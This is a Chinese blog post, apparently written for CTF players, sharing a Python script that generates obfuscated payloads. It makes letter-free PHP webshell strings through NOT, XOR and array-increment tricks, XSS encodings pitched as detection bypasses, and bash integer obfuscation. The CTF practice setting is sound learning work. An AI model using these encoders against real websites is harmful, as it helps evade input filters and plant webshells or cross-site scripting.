Payload生成脚本(命令执行,XSS,奇葩等价变形等)

辅助用Payload生成脚本

Hello师傅们好,好久不见吖,R1chm0nd又来啦。

做CTF题的时候经常要用一些复杂的payload,这时候手动转换效率就会很低,特别是命令执行的题目
所以就花了点时间写了个脚本,里面集成了P神文章《一些不包含数字和字母的webshell》里面需要的payload。需要的师傅们自取啦,并且希望师傅们发挥Linux社区的精神,不断扩展这个脚本。
代码如下:
直接输入文件名.py会显示帮助信息。

import sys
from getopt import getopt
def notx(payload):
	a=''
	retval=""
	for x in payload:
		a=''
		for bi in '0'*(8-len(format(ord(x),'b')))+format(ord(x),'b'):
			k='1' if bi=='0' else '0'
			a=a+k
		retval=retval+'%'+format(int(a,2),'x')
	return retval
def xor(payload):
	a=""
	b=""
	bar=0
	for x in payload:
		bar=0
		for i in range(0,127):
			if bar==1:
				break
			for j in range(0,127):
				result=i^j	
				if (result==ord(str(x))):
					if  ((j>90 and j<97) or (j>57 and j<65) or (j>1 and j<32)) and ((i>90 and i<97) or (i>57 and i<65) or (i>1 and i<32)):
						print(i,j,result,x,ord(str(x)))
						a+='%'+'0'*(2-len(format(i,'x')))+format(i,'x')
						b+='%'+'0'*(2-len(format(j,'x')))+format(j,'x')
						bar=1
						break
	return ('(\"'+a+'\"'+'^'+'\"'+b+'\")')
def afa(payload):
	retval=""
	retval+=r"$_=[];$_=@\"$_\";$_=['!'=='@'];$___=$_;$__=$_;"+"\n"
	for x in payload:		
		retval+=r"//"+x+"\n"
		retval+=r"$__++;"*(ord(x)-65)+"\n"
		retval+=r"$___.=$__;"
	return retval
def xss(payload):
	return 'String.fromCharCode('+",".join(str(ord(n)) for n in payload)+')',"&#"+"&#".join(str(ord(n))+';' for n in payload)
def ints(payload):
	if(isinstance(payload,int)):
		return ("$((~$(("+"$((~$(())))"*int(payload)+"))))")
	else:
		return "Only intergers,please."
def chrx(payload):
	return '.'.join("chr("+str(ord(x))+")" for x in payload)
def help(payload):
	retval=r'''
	Here are the parameters that you can use to change your payload:

	1.--not	Change your payload into converse one and encode it as hex
	2.--xor	Generate two strings equal to your payload basing on xor
	3.--afa	Generate strings equal to your payload basing on the propertites of PHP's array
	4.--xss	Generate two strings that may bypass the detection of the XSS
	5.--chrx	Change your payload into PHP's style with ASCII
	6.--ints	Change the interger into chars that can be used in command execution(Linux terminal)'''
	return retval
if __name__=="__main__":
	try:
		payload=""
		opts,args=getopt(sys.argv[1:],"h",["not=","xor=","afa=","xss=","chrx=","ints="])
		search={
     "--not":notx,
			"--xor":xor,
			"--afa":afa,
			"--xss":xss,
			"--chrx":chrx,
			"--ints":ints,
			"-h":help}
		payload=opts[0][1] if opts[0][1]!='' else ''
		print(search.get(opts[0][0])(payload))
	except IndexError:
		print(help(""))

你可能感兴趣的:(脚本,信息安全)